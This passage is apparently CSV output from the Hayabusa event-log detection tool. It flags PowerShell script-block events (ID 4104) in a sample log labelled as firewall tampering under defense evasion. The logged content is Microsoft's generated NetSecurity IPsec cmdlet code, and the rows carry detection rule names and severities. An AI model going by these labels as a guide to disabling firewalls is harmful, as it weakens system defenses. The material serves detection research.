$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilde",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"r.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 
'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 
'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember 
-Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${Asso",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 
19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"r.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 
'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact 
($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] 
[Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${Asso",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ciatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 